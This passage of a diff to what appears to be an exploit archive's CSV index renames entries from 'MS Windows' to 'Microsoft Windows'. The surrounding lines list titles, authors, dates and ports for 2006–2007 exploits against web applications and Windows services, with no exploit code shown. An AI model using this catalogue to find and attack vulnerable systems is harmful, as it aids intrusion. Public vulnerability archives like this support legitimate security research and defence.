(MS06-035)",2006-07-21,cocoruder,windows,dos,0 +2057,platforms/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0 2058,platforms/php/webapps/2058.txt,"PHP Forge <= 3 beta 2 (cfg_racine) Remote File Inclusion Vulnerability",2006-07-22,"Virangar Security",php,webapps,0 2059,platforms/hardware/dos/2059.cpp,"D-Link Router UPNP Stack Overflow Denial of Service Exploit (PoC)",2006-07-22,ub3rst4r,hardware,dos,0 2060,platforms/php/webapps/2060.txt,"PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability",2006-07-23,magnific,php,webapps,0 @@ -1856,7 +1856,7 @@ id,file,description,date,author,platform,type,port 2159,platforms/php/webapps/2159.pl,"PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection Exploit",2006-08-09,simo64,php,webapps,0 2160,platforms/windows/dos/2160.c,"OpenMPT <= 1.17.02.43 Multiple Remote Buffer Overflow Exploit PoC",2006-08-10,"Luigi Auriemma",windows,dos,0 2161,platforms/php/webapps/2161.pl,"SAPID CMS <= 1.2.3_rc3 (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,0 -2162,platforms/windows/remote/2162.pm,"MS Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-08-10,"H D Moore",windows,remote,445 +2162,platforms/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-08-10,"H D Moore",windows,remote,445 2163,platforms/php/webapps/2163.txt,"phpwcms <= 1.1-RC4 (spaw) Remote File Include Vulnerability",2006-08-10,Morgan,php,webapps,0 2164,platforms/windows/remote/2164.pm,"Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (2)",2006-08-10,"H D Moore",windows,remote,0 2165,platforms/php/webapps/2165.txt,"Spaminator <= 1.7 (page) Remote File Include Vulnerability",2006-08-10,Drago84,php,webapps,0 @@ -1888,7 +1888,7 @@ id,file,description,date,author,platform,type,port 2191,platforms/php/webapps/2191.txt,"dotProject <= 2.0.4 (baseDir) Remote File Include Vulnerability",2006-08-16,Kacper,php,webapps,0 2192,platforms/php/webapps/2192.txt,"OPT Max <= 1.2.0 (CRM_inc) Remote File Include Vulnerability",2006-08-16,Kacper,php,webapps,0 2193,platforms/linux/local/2193.php,"PHP <= 4.4.3 / 5.1.4 (sscanf) Local Buffer Overflow Exploit",2006-08-16,Andi,linux,local,0 -2194,platforms/windows/dos/2194.pl,"MS Windows PNG File IHDR Block Denial of Service Exploit PoC",2006-08-16,Preddy,windows,dos,0 +2194,platforms/windows/dos/2194.pl,"Microsoft Windows PNG File IHDR Block Denial of Service Exploit PoC",2006-08-16,Preddy,windows,dos,0 2195,platforms/windows/dos/2195.html,"VMware 5.5.1 COM Object Arbitrary Partition Table Delete Exploit",2006-08-16,nop,windows,dos,0 2196,platforms/php/webapps/2196.txt,"Mambo CopperminePhotoGalery Component Remote Include Vulnerability",2006-08-16,k1tk4t,php,webapps,0 2198,platforms/php/webapps/2198.php,"CubeCart <= 3.0.11 (oid) Remote Blind SQL Injection Exploit",2006-08-17,rgod,php,webapps,0 @@ -1897,13 +1897,13 @@ id,file,description,date,author,platform,type,port 2201,platforms/php/webapps/2201.txt,"POWERGAP <= 2003 (s0x.php) Remote File Include Vulnerability",2006-08-17,"Saudi Hackrz",php,webapps,0 2202,platforms/php/webapps/2202.txt,"Mambo mambelfish Component <= 1.1 - Remote File Include Vulnerability",2006-08-17,mdx,php,webapps,0 2203,platforms/php/webapps/2203.txt,"Joomla com_jim Component <= 1.0.1 - Remote File Include Vulnerability",2006-08-17,"Mehmet Ince",php,webapps,0 -2204,platforms/windows/dos/2204.c,"MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c)",2006-08-17,Preddy,windows,dos,0 +2204,platforms/windows/dos/2204.c,"Microsoft Windows PNG File IHDR Block Denial of Service Exploit PoC (c)",2006-08-17,Preddy,windows,dos,0 2205,platforms/php/webapps/2205.txt,"Joomla Mosets Tree <= 1.0 - Remote File Include Vulnerability",2006-08-17,Crackers_Child,php,webapps,0 2206,platforms/php/webapps/2206.txt,"Mambo phpShop Component <= 1.2 RC2b File Include Vulnerability",2006-08-17,Cmaster4,php,webapps,0 2207,platforms/php/webapps/2207.txt,"Mambo a6mambocredits Component 1.0.0 File Include Vulnerability",2006-08-17,Cmaster4,php,webapps,0 2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 (IE Plugin) Remote Denial of Service Crash Exploit",2006-08-18,Mr.Niega,windows,dos,0 2209,platforms/php/webapps/2209.txt,"Joomla Artlinks Component <= 1.0b4 Remote Include Vulnerability",2006-08-18,camino,php,webapps,0 -2210,platforms/windows/dos/2210.c,"MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2)",2006-08-18,vegas78,windows,dos,0 +2210,platforms/windows/dos/2210.c,"Microsoft Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2)",2006-08-18,vegas78,windows,dos,0 2211,platforms/php/webapps/2211.txt,"PHlyMail Lite <= 3.4.4 (mod.listmail.php) Remote Include Vulnerability",2006-08-18,Kacper,php,webapps,0 2212,platforms/php/webapps/2212.txt,"phpCodeGenie <= 3.0.2 (BEAUT_PATH) Remote File Include Vulnerability",2006-08-18,Kacper,php,webapps,0 2213,platforms/php/webapps/2213.txt,"Mambo MamboWiki Component <= 0.9.6 - Remote Include Vulnerability",2006-08-18,camino,php,webapps,0 @@ -1916,7 +1916,7 @@ id,file,description,date,author,platform,type,port 2220,platforms/php/webapps/2220.txt,"Tutti Nova <= 1.6 (TNLIB_DIR) Remote File Include Vulnerability",2006-08-19,SHiKaA,php,webapps,0 2221,platforms/php/webapps/2221.txt,"Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability",2006-08-19,SHiKaA,php,webapps,0 2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component <= 0.6b Include Vulnerability",2006-08-19,mdx,php,webapps,0 -2223,platforms/windows/remote/2223.c,"MS Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139 +2223,platforms/windows/remote/2223.c,"Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139 2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat <= 3.1 - (adminlog) Remote File Incude Vulnerability",2006-08-19,SHiKaA,php,webapps,0 2225,platforms/php/webapps/2225.txt,"mambo com_babackup Component <= 1.1 File Include Vulnerability",2006-08-19,mdx,php,webapps,0 2226,platforms/php/webapps/2226.txt,"NES Game and NES System <= c108122 File Include Vulnerabilities",2006-08-20,Kacper,php,webapps,0 @@ -1958,7 +1958,7 @@ id,file,description,date,author,platform,type,port 2262,platforms/php/webapps/2262.php,"CMS Frogss <= 0.4 (podpis) Remote SQL Injection Exploit",2006-08-27,Kacper,php,webapps,0 2263,platforms/php/webapps/2263.txt,"Ay System CMS <= 2.6 (main.php) Remote File Include Vulnerability",2006-08-27,SHiKaA,php,webapps,0 2264,platforms/windows/local/2264.htm,"VMware 5.5.1 (ActiveX) Local Buffer Overflow Exploit",2006-08-27,c0ntex,windows,local,0 -2265,platforms/windows/remote/2265.c,"MS Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445 +2265,platforms/windows/remote/2265.c,"Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445 2266,platforms/cgi/webapps/2266.txt,"Cybozu Products (id) Arbitrary File Retrieval Vulnerability",2006-08-28,"Tan Chew Keong",cgi,webapps,0 2267,platforms/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple Remote SQL Injection Vulnerabilities",2006-08-28,"Tan Chew Keong",cgi,webapps,0 2268,platforms/php/webapps/2268.php,"e107 <= 0.75 - (GLOBALS Overwrite) Remote Code Execution Exploit",2006-08-28,rgod,php,webapps,0 @@ -2048,7 +2048,7 @@ id,file,description,date,author,platform,type,port 2352,platforms/php/webapps/2352.txt,"webSPELL <= 4.01.01 Database Backup Download Vulnerability",2006-09-12,Trex,php,webapps,0 2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded <= 1.0.6-r3 Remote File Include Vulnerability",2006-09-12,CeNGiZ-HaN,php,webapps,0 2354,platforms/php/webapps/2354.txt,"Signkorn Guestbook <= 1.3 (dir_path) Remote File Include Vulnerability",2006-09-12,SHiKaA,php,webapps,0 -2355,platforms/windows/remote/2355.pm,"MS Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3)",2006-09-13,"Trirat Puttaraksa",windows,remote,445 +2355,platforms/windows/remote/2355.pm,"Microsoft Windows 2003 - NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-09-13,"Trirat Puttaraksa",windows,remote,445 2356,platforms/php/webapps/2356.txt,"Quicksilver Forums <= 1.2.1 (set) Remote File Include Vulnerability",2006-09-13,mdx,php,webapps,0 2357,platforms/php/webapps/2357.txt,"phpunity.postcard (gallery_path) Remote File Include Vulnerability",2006-09-13,Rivertam,php,webapps,0 2358,platforms/windows/remote/2358.c,"MS Internet Explorer COM Object Remote Heap Overflow Exploit",2006-09-13,nop,windows,remote,0 @@ -2105,7 +2105,7 @@ id,file,description,date,author,platform,type,port 2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 (dix.php3) Remote File Include Vulnerability",2006-09-21,DaDIsS,php,webapps,0 2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 (phpQRootDir) Remote File Include Vulnerability",2006-09-21,Solpot,php,webapps,0 2411,platforms/php/webapps/2411.pl,"ProgSys <= 0.156 (RR.php) Remote File Include Exploit",2006-09-21,Kacper,php,webapps,0 -2412,platforms/windows/local/2412.c,"MS Windows (Windows Kernel) - Privilege Escalation Exploit (MS06-049)",2006-09-21,SoBeIt,windows,local,0 +2412,platforms/windows/local/2412.c,"Microsoft Windows - (Windows Kernel) - Privilege Escalation Exploit (MS06-049)",2006-09-21,SoBeIt,windows,local,0 2413,platforms/php/webapps/2413.txt,"SolidState <= 0.4 - Multiple Remote File Include Vulnerabilities",2006-09-21,Kacper,php,webapps,0 2414,platforms/php/webapps/2414.txt,"Wili-CMS <= 0.1.1 (include/xss/full path) Remote Vulnerabilities",2006-09-21,"HACKERS PAL",php,webapps,0 2415,platforms/php/webapps/2415.php,"exV2 <= 2.0.4.3 - extract() Remote Command Execution Exploit",2006-09-22,rgod,php,webapps,0 @@ -2361,7 +2361,7 @@ id,file,description,date,author,platform,type,port 2669,platforms/php/webapps/2669.php,"Free Image Hosting <= 1.0 (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 2670,platforms/php/webapps/2670.php,"Free File Hosting <= 1.1 (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 NDS Server Remote Stack Overflow Exploit",2006-10-28,FistFuXXer,windows,remote,8028 -2672,platforms/windows/dos/2672.py,"MS Windows NAT Helper Components (ipnathlp.dll) Remote DoS Exploit",2006-10-28,h07,windows,dos,0 +2672,platforms/windows/dos/2672.py,"Microsoft Windows NAT Helper Components (ipnathlp.dll) Remote DoS Exploit",2006-10-28,h07,windows,dos,0 2673,platforms/php/webapps/2673.txt,"Simple Website Software 0.99 (common.php) File Include Vulnerability",2006-10-29,"Mehmet Ince",php,webapps,0 2674,platforms/php/webapps/2674.php,"MySource CMS <= 2.16.2 (init_mysource.php) Remote File Include Exploit",2006-10-29,Kacper,php,webapps,0 2675,platforms/php/webapps/2675.asp,"PHPEasyData Pro 2.2.2 (index.php) Remote SQL Injection Exploit",2006-10-29,ajann,php,webapps,0 @@ -2371,7 +2371,7 @@ id,file,description,date,author,platform,type,port 2679,platforms/php/webapps/2679.txt,"PHPMyRing <= 4.2.1 (cherche.php) Remote SQL Injection Vulnerability",2006-10-29,ajann,php,webapps,0 2680,platforms/windows/remote/2680.pm,"PrivateWire Gateway 3.7 - Remote Buffer Overflow Exploit (win32)",2006-10-29,"Michael Thumann",windows,remote,80 2681,platforms/php/webapps/2681.txt,"QnECMS <= 2.5.6 (adminfolderpath) Remote File Inclusion Exploit",2006-10-30,K-159,php,webapps,0 -2682,platforms/windows/dos/2682.pl,"MS Windows NAT Helper Components Remote DoS Exploit (perl)",2006-10-30,x82,windows,dos,0 +2682,platforms/windows/dos/2682.pl,"Microsoft Windows NAT Helper Components Remote DoS Exploit (perl)",2006-10-30,x82,windows,dos,0 2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement (key) Remote SQL Injection Vulnerability",2006-10-30,ajann,asp,webapps,0 2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 (key) Remote SQL Injection Vulnerability",2006-10-30,ajann,asp,webapps,0 2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a (includes/common.php) Remote Code Execution Exploit",2006-10-30,Kacper,php,webapps,0 @@ -2476,7 +2476,7 @@ id,file,description,date,author,platform,type,port 2786,platforms/php/webapps/2786.txt,"torrentflux <= 2.2 (create/exec/delete) Multiple Vulnerabilities",2006-11-15,r0ut3r,php,webapps,0 2787,platforms/windows/dos/2787.c,"UniversalFTP 1.0.50 (MKD) Remote Denial of Service Exploit",2006-11-15,"Greg Linares",windows,dos,0 2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (libucache.dylib) Privilege Escalation Exploit (OSX)",2006-11-15,"Kevin Finisterre",osx,local,0 -2789,platforms/windows/remote/2789.cpp,"MS Windows - NetpManageIPCConnect Stack Overflow Exploit (MS06-070)",2006-11-16,cocoruder,windows,remote,0 +2789,platforms/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow Exploit (MS06-070)",2006-11-16,cocoruder,windows,remote,0 2790,platforms/php/webapps/2790.pl,"Etomite CMS <= 0.6.1.2 (manager/index.php) Local File Include Exploit",2006-11-16,Revenge,php,webapps,0 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool (download.php) Information Disclosure Vulnerability",2006-11-16,"Craig Heffner",php,webapps,0 2794,platforms/php/webapps/2794.txt,"mg.applanix <= 1.3.1 (apx_root_path) Remote File Include Vulnerabilities",2006-11-17,v1per-haCker,php,webapps,0 @@ -2485,10 +2485,10 @@ id,file,description,date,author,platform,type,port 2797,platforms/php/webapps/2797.txt,"Powies pForum <= 1.29a (editpoll.php) SQL Injection Vulnerability",2006-11-17,SHiKaA,php,webapps,0 2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability",2006-11-17,SHiKaA,php,webapps,0 2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 (mx_common.php) File Include Vulnerability",2006-11-17,bd0rk,php,webapps,0 -2800,platforms/windows/remote/2800.cpp,"MS Windows - Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0 +2800,platforms/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0 2807,platforms/php/webapps/2807.pl,"MosReporter Joomla Component 0.9.3 - Remote File Include Exploit",2006-11-17,Crackers_Child,php,webapps,0 2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a (check_status.php) Remote File Include Vulnerability",2006-11-17,DeltahackingTEAM,php,webapps,0 -2809,platforms/windows/remote/2809.py,"MS Windows NetpManageIPCConnect Stack Overflow Exploit (py)",2006-11-18,"Winny Thomas",windows,remote,445 +2809,platforms/windows/remote/2809.py,"Microsoft Windows NetpManageIPCConnect Stack Overflow Exploit (py)",2006-11-18,"Winny Thomas",windows,remote,445 2810,platforms/php/webapps/2810.php,"Oxygen <= 1.1.3 (O2PHP Bulletin Board) Remote SQL Injection Exploit",2006-11-18,DarkFig,php,webapps,0 2811,platforms/php/webapps/2811.txt,"phpWebThings <= 1.5.2 (editor.php) Remote File Include Vulnerability",2006-11-18,nuffsaid,php,webapps,0 2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader <= 1.5 (save.php) Remote Code Execution Exploit",2006-11-18,nuffsaid,php,webapps,0 @@ -2553,7 +2553,7 @@ id,file,description,date,author,platform,type,port 2876,platforms/php/webapps/2876.txt,"deV!Lz Clanportal [DZCP] <= 1.3.6 - Arbitrary File Upload Vulnerability",2006-12-01,"Tim Weber",php,webapps,0 2877,platforms/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 - SQL Injection Vulnerability",2006-12-01,N/A,php,webapps,0 2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - (admin/FileServer.php) File Disclosure Vulnerability",2006-12-01,qobaiashi,php,webapps,0 -2879,platforms/windows/dos/2879.py,"MS Windows spoolss GetPrinterData() Remote DoS Exploit (0day)",2006-12-01,h07,windows,dos,0 +2879,platforms/windows/dos/2879.py,"Microsoft Windows spoolss GetPrinterData() Remote DoS Exploit (0day)",2006-12-01,h07,windows,dos,0 2880,platforms/windows/local/2880.c,"BlazeVideo HDTV Player <= 2.1 Malformed PLF Buffer Overflow PoC",2006-12-01,"Greg Linares",windows,local,0 2881,platforms/asp/webapps/2881.txt,"Ultimate HelpDesk (XSS/Local File Disclosure) Vulnerabilities",2006-12-01,ajann,asp,webapps,0 2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional (Path Disclosure/Include) Multiple Vulns",2006-12-02,y3dips,php,webapps,0 @@ -2574,7 +2574,7 @@ id,file,description,date,author,platform,type,port 2897,platforms/php/webapps/2897.txt,"CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability",2006-12-08,"Paul Bakoyiannis",php,webapps,0 2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 (render.php) Remote File Inclusion Vulnerability",2006-12-08,r0ut3r,php,webapps,0 2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass SQL Injection Vulnerability",2006-12-08,koray,php,webapps,0 -2900,platforms/windows/dos/2900.py,"MS Windows DNS Resolution - Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0 +2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution - Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0 2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0 2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0 2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0 @@ -2639,7 +2639,7 @@ id,file,description,date,author,platform,type,port 2964,platforms/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Include Vulnerabilities",2006-12-20,mdx,php,webapps,0 2965,platforms/php/webapps/2965.txt,"TextSend <= 1.5 (config/sender.php) Remote File Include Vulnerability",2006-12-20,nuffsaid,php,webapps,0 2966,platforms/windows/dos/2966.html,"RealPlayer 10.5 (ActiveX Control) Denial of Service Exploit",2006-12-20,shinnai,windows,dos,0 -2967,platforms/windows/dos/2967.cs,"MS Windows (MessageBox) Memory Corruption Local Denial of Service",2006-12-20,N/A,windows,dos,0 +2967,platforms/windows/dos/2967.cs,"Microsoft Windows - (MessageBox) Memory Corruption Local Denial of Service",2006-12-20,N/A,windows,dos,0 2968,platforms/php/webapps/2968.php,"PHP Advanced Transfer Manager <= 1.30 Source Code Disclosure Exploit",2006-12-20,Kacper,php,webapps,0 2969,platforms/php/webapps/2969.txt,"Php/Mysql Site Builder 0.0.2 (htm2php.php) File Disclosure Vulnerability",2006-12-21,"the master",php,webapps,0 2970,platforms/php/webapps/2970.txt,"Newxooper-php 0.9.1 (mapage.php) Remote File Include Vulnerability",2006-12-21,3l3ctric-Cracker,php,webapps,0 @@ -2685,7 +2685,7 @@ id,file,description,date,author,platform,type,port 3010,platforms/php/webapps/3010.txt,"myphpNuke Module My_eGallery 2.5.6 (basepath) RFI Vulnerability",2006-12-25,"Mehmet Ince",php,webapps,0 3011,platforms/php/webapps/3011.pl,"Fishyshoop <= 0.930b Remote Add Administrator Account Exploit",2006-12-25,"James Gray",php,webapps,0 3012,platforms/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 (ataturk.php) Remote File Include Vulnerability",2006-12-25,ShaFuck31,php,webapps,0 -3013,platforms/windows/dos/3013.py,"MS Windows NetrWkstaUserEnum() Remote DoS Exploit (0day)",2006-12-25,h07,windows,dos,0 +3013,platforms/windows/dos/3013.py,"Microsoft Windows NetrWkstaUserEnum() Remote DoS Exploit (0day)",2006-12-25,h07,windows,dos,0 3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 - Remote Upload File / Code Execution Vuln",2006-12-25,CorryL,php,webapps,0 3015,platforms/asp/webapps/3015.pl,"The Classified Ad System 1.0 (main) Remote SQL Injection Exploit",2006-12-26,ajann,asp,webapps,0 3016,platforms/php/webapps/3016.php,"Cahier de texte 2.2 Bypass General Access Protection Exploit",2006-12-26,DarkFig,php,webapps,0 @@ -2694,9 +2694,9 @@ id,file,description,date,author,platform,type,port 3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b (cal_dir) Remote File Include Vulnerabilities",2006-12-26,Cr@zy_King,php,webapps,0 3020,platforms/php/webapps/3020.pl,"PHP-Update <= 2.7 (admin/uploads.php) Remote Code Execution Exploit",2006-12-26,undefined1_,php,webapps,0 3021,platforms/linux/remote/3021.txt,"ProFTPD <= 1.2.9 rc2 (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21 -3022,platforms/windows/remote/3022.txt,"MS Windows ASN.1 - Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445 +3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 - Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445 3023,platforms/linux/dos/3023.c,"KsIRC 1.3.12 (PRIVMSG) Remote Buffer Overflow PoC",2006-12-26,"Federico L. Bossi Bonin",linux,dos,0 -3024,platforms/windows/local/3024.c,"MS Windows NtRaiseHardError Csrss.exe Memory Disclosure Exploit",2006-12-27,"Ruben Santamarta ",windows,local,0 +3024,platforms/windows/local/3024.c,"Microsoft Windows NtRaiseHardError Csrss.exe Memory Disclosure Exploit",2006-12-27,"Ruben Santamarta ",windows,local,0 3025,platforms/php/webapps/3025.pl,"Yrch 1.0 (plug.inc.php path variable) Remote File Include Exploit",2006-12-27,DeltahackingTEAM,php,webapps,0 3026,platforms/php/webapps/3026.txt,"Bubla <= 1.0.0rc2 (bu/process.php) Remote File Include Vulnerability",2006-12-27,DeltahackingTEAM,php,webapps,0 3027,platforms/php/webapps/3027.txt,"Fantastic News <= 2.1.4 - Multiple Remote File Include Vulnerabilities",2006-12-27,Mr-m07,php,webapps,0 @@ -2723,7 +2723,7 @@ id,file,description,date,author,platform,type,port 3049,platforms/php/webapps/3049.php,"IMGallery <= 2.5 Create Uploader Script Exploit",2006-12-30,Kacper,php,webapps,0 3050,platforms/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge (boarddir) Remote File Include Vulnerability",2006-12-30,"Mehmet Ince",php,webapps,0 3051,platforms/php/webapps/3051.txt,"Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability",2006-12-30,"Mehmet Ince",php,webapps,0 -3052,platforms/windows/dos/3052.c,"MS Windows NtRaiseHardError Csrss.exe-winsrv.dll Double Free",2006-12-31,"Ruben Santamarta ",windows,dos,0 +3052,platforms/windows/dos/3052.c,"Microsoft Windows NtRaiseHardError Csrss.exe-winsrv.dll Double Free",2006-12-31,"Ruben Santamarta ",windows,dos,0 3053,platforms/php/webapps/3053.txt,"Vz (Adp) Forum 2.0.3 - Remote Password Disclosure Vulnerablity",2006-12-31,3l3ctric-Cracker,php,webapps,0 3054,platforms/php/webapps/3054.txt,"P-News 1.16 / 1.17 (user.dat) Remote Password Disclosure Vulnerablity",2006-12-31,3l3ctric-Cracker,php,webapps,0 3055,platforms/windows/remote/3055.html,"WinZIP 10.0 FileView ActiveX Controls Remote Overflow Exploit",2006-12-31,XiaoHui,windows,remote,0 @@ -2782,7 +2782,7 @@ id,file,description,date,author,platform,type,port 3108,platforms/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Include Exploit",2007-01-09,DeltahackingTEAM,php,webapps,0 3109,platforms/php/webapps/3109.php,"Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit",2007-01-10,rgod,php,webapps,0 3110,platforms/osx/dos/3110.rb,"Mac OS X 10.4.8 Apple Finder DMG Volume Name Memory Corruption PoC",2007-01-09,MoAB,osx,dos,0 -3111,platforms/windows/dos/3111.pl,"MS Windows Explorer (WMF) CreateBrushIndirect DoS Exploit",2007-01-13,cyanid-E,windows,dos,0 +3111,platforms/windows/dos/3111.pl,"Microsoft Windows - Explorer (WMF) CreateBrushIndirect DoS Exploit",2007-01-13,cyanid-E,windows,dos,0 3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0 3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability",2007-01-10,irvian,php,webapps,0 3114,platforms/php/webapps/3114.txt,"Article System 0.1 (INCLUDE_DIR) Remote File Include Vulnerabilities",2007-01-11,3l3ctric-Cracker,php,webapps,0 @@ -2858,7 +2858,7 @@ id,file,description,date,author,platform,type,port 3186,platforms/asp/webapps/3186.txt,"ASP EDGE <= 1.2b (user.asp) Remote SQL Injection Vulnerability",2007-01-24,ajann,asp,webapps,0 3187,platforms/asp/webapps/3187.txt,"ASP NEWS <= 3.0 - (news_detail.asp) Remote SQL Injection Vulnerability",2007-01-24,ajann,asp,webapps,0 3189,platforms/hardware/remote/3189.sh,"PA168 Chipset IP Phones Weak Session Management Exploit",2007-01-24,"Adrian ""pagvac"" Pastor",hardware,remote,0 -3190,platforms/windows/dos/3190.py,"MS Windows Explorer (AVI) Unspecified Denial of Service Exploit",2007-01-24,shinnai,windows,dos,0 +3190,platforms/windows/dos/3190.py,"Microsoft Windows - Explorer (AVI) Unspecified Denial of Service Exploit",2007-01-24,shinnai,windows,dos,0 3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 (MODULES_DIR) Remote File Inclusion Vulnerability",2007-01-24,3l3ctric-Cracker,php,webapps,0 3192,platforms/php/webapps/3192.pl,"Xero Portal (phpbb_root_path) Remote File Include Vulnerablity",2007-01-24,"Mehmet Ince",php,webapps,0 3193,platforms/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record DoS PoC (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0 @@ -3083,7 +3083,7 @@ id,file,description,date,author,platform,type,port 3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 (lcnt) Remote SQL Injection Exploit",2007-03-05,ajann,php,webapps,0 3417,platforms/windows/local/3417.php,"PHP <= 4.4.6 mssql_[p]connect() Local Buffer Overflow Exploit",2007-03-05,rgod,windows,local,0 3418,platforms/windows/dos/3418.pl,"Mercury/32 Mail Server <= 4.01b (check) Buffer Overflow Exploit PoC",2007-03-06,mu-b,windows,dos,0 -3419,platforms/windows/dos/3419.txt,"MS Windows (.doc File) Malformed Pointers Denial of Service Exploit",2007-03-06,Marsu,windows,dos,0 +3419,platforms/windows/dos/3419.txt,"Microsoft Windows - (.doc File) Malformed Pointers Denial of Service Exploit",2007-03-06,Marsu,windows,dos,0 3420,platforms/windows/remote/3420.html,"WinZip <= 10.0.7245 - FileView ActiveX Buffer Overflow Exploit (2)",2007-03-06,prdelka,windows,remote,0 3421,platforms/windows/dos/3421.html,"Macromedia 10.1.4.20 SwDir.dll Internet Explorer Stack Overflow DoS",2007-03-07,shinnai,windows,dos,0 3422,platforms/windows/remote/3422.pl,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (Perl Version)",2007-03-07,"Umesh Wanve",windows,remote,0 @@ -3115,7 +3115,7 @@ id,file,description,date,author,platform,type,port 3450,platforms/php/webapps/3450.php,"NukeSentinel <= 2.5.06 - Remote SQL Injection Exploit",2007-03-10,DarkFig,php,webapps,0 3451,platforms/windows/local/3451.c,"Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32)",2007-03-10,"Cesar Cerrudo",windows,local,0 3452,platforms/multiple/remote/3452.php,"PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit",2007-03-10,"Stefan Esser",multiple,remote,0 -3453,platforms/windows/dos/3453.py,"MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption",2007-03-10,h07,windows,dos,0 +3453,platforms/windows/dos/3453.py,"Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption",2007-03-10,h07,windows,dos,0 3454,platforms/php/webapps/3454.pl,"PostNuke Module phgstats 0.5 (phgdir) Remote File Include Exploit",2007-03-11,bd0rk,php,webapps,0 3455,platforms/php/webapps/3455.htm,"JobSitePro 1.0 (search.php) Remote SQL Injection Exploit",2007-03-11,ajann,php,webapps,0 3456,platforms/php/webapps/3456.pl,"Top Auction 1.0 (viewcat.php) Remote SQL Injection Exploit",2007-03-11,ajann,php,webapps,0 @@ -3275,7 +3275,7 @@ id,file,description,date,author,platform,type,port 3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 